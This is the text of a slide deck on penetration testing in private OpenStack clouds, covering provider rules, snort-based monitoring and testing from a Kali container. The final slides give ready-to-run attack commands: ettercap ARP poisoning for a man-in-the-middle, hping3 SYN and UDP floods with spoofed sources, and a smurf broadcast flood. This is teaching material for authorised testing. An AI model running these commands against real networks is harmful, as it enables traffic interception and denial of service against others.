3. 3
Penetration Testing
● “Wargames”
● Mimic real attacks
● Test IDS/firewall detection
● Test security
● How
● Typically simulate attacks in a “safe” environment
● Or, attack actual machines
● Use special software, e.g. Nessus, metasploit, nmap..
5. 5
Challenges on Cloud
● CSP have good security
● But, guests are your responsibility to protect
● Virtual
● No HW security appliances
● No low level access (grub)
● IP addresses may be ephermal
● Some pen tests could be expensive
● Penetration tests cannot affect others
6. 6
Private Cloud Security
● Can't attack from cloud with spoofed source address
● Infrastructure resilient to DDOS (LOTS of bandwidth)
● Cannot sniff other tenant's traffic
● You could be attacked by any of..
● Spoofing, portscan, MITM, DOS
8. 8
Policies For Penetration Tests
● Most CSP will grant permission for a window of time
● No DOS tests
● No tests on instances that share physical network
● on AWS cannot use m1.small or t1.micro
● Some CSP have slow responses to requests
11. 11
Per instance vulnerability tests
● Do not wish to affect other instances
● Want to observe an instance's traffic
● Run an IDS against a particular instance
13. 13
Bridges
Bonding? No, do not want to
Modify
Can tap the interface with snort
(run multiple snorts on host?)
Could rate limit interfaces on bridges
Openstack allows rate limits or absolute
limits on accounts
Tc – traffic shaper
15. 15
Private Cloud Tenant
● Suppose wish to avoid network traffic
● How about attack from a container?
● IP address, MTU
● NAT for external connections
● “Ceiling” on container resources
● No “floor” / minimal guaranteed resources
● Skips external firewall !
16. 16
Set up
● Kali – popular penetration
● testing distro
● Debian on red hat –
● 10.x.x.x subnet
● Import files (eg pcap)
docker bridge
V
kali
container
instance
V
V
qbr..
sudo docker
run --privileged pandrew/kali /bin/bash
19. 19
Man in the Middle
● Ettercap
● Two machines, each with IP address
● Poison ARP table
● Simulate victim and middleman
Examples
apt-get install ettercap-text-only
ettercap -T -M ARP -j /tmp/hosts.txt -F html.ef /172.17.0.26/ //
20. 20
Denial of Service
● Hping3 from docker container
● Cannot stress system
SYN attack to port 22
hping3 -c 10000 -d 120 -S -w 64 -p 22 --flood --rand-source -i eth0 172.17.42.1
lage UDP packets
●hping3 --rand-source --udp --flood -d 8192 172.17.42.1
Smurf
sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=0
●hping3 -1 --flood -a 172.17.0.23 172.17.255.255
●Max bandwidth test...
●DDOS